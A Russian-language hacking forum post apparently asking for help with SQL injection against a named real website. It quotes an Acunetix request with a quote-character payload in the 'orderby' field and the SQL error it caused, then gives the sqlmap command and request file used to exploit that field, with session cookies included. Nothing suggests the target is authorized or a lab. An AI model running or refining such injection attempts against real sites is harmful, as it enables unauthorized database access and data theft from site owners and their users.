Тема: Вопросы по SQLMap
Показать сообщение отдельно

  #10  
Старый 10.04.2016, 20:44
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956

Репутация: 0
По умолчанию
Цитата:
Сообщение от ghost8  

POST / HTTP/1.1
Content-Length: 1439
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TFWLMOFXSC
Referer:
http://www.admir.kz/
Cookie: bestbuyplanet=201607042017315d3489f5e81da776b9e9e1 fad1808e87; astratop=1; s=1; ruid=Nq0eBkuZBldOBQAAAexeag==; top100rb=NjczKzY3Ng==; _ym_uid=1460050539758942208; yabs-vdrf=A0; _ym_isad=2; VISID=TTEFYBEBKWRPXCLTMU; _ym_visorc_13406191=w
Host:
www.admir.kz
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="BannerPlace"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="category"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="contenttype"
ResourceOffer
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="filterMode"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="location"
kazakhstan
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="next"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="orderby"
1'"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="page"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageName"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="pagesMethod"
post
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageTitle"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryGroup"
ad
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryID"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="SID"
classifieds
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="treeType"
-------AcunetixBoundary_TFWLMOFXSC--
Response
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Thu, 07 Apr 2016 22:56:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Cache-Control: no-cache, private, no-store, must-revalidate, proxy-revalidate, max-stale=0, post-check=0, pre-check=0, max-age=0, s-maxage=0
Pragma: no-cache
Original-Content-Encoding: gzip
Content-Length: 48275
POST (multipart) input orderby was set to 1'"

Error message found:

You have an error in your SQL syntax

Пробую вот так:

sqlmap.py -r "C:\site.txt" --random-ag

В site.txt :

POST / HTTP/1.1

Content-Length: 1439

Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TFWLMOFXSC

Referer: http://www.admir.kz/

Cookie: bestbuyplanet=201607042017315d3489f5e81da776b9e9e1 fad1808e87; astratop=1; s=1; ruid=Nq0eBkuZBldOBQAAAexeag==; top100rb=NjczKzY3Ng==; _ym_uid=1460050539758942208; yabs-vdrf=A0; _ym_isad=2; VISID=TTEFYBEBKWRPXCLTMU; _ym_visorc_13406191=w

Host: www.admir.kz

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="BannerPlace"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="category"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="contenttype"

ResourceOffer

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="filterMode"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="location"

kazakhstan

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="next"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="orderby*"

1'"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="page"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="PageName"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="pagesMethod"

post

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="PageTitle"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="ResourceCategoryGroup"

ad

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="ResourceCategoryID"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="SID"

classifieds

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="treeType"

-------AcunetixBoundary_TFWLMOFXSC--

Не находит sql что делаю не так?
 
Ответить с цитированием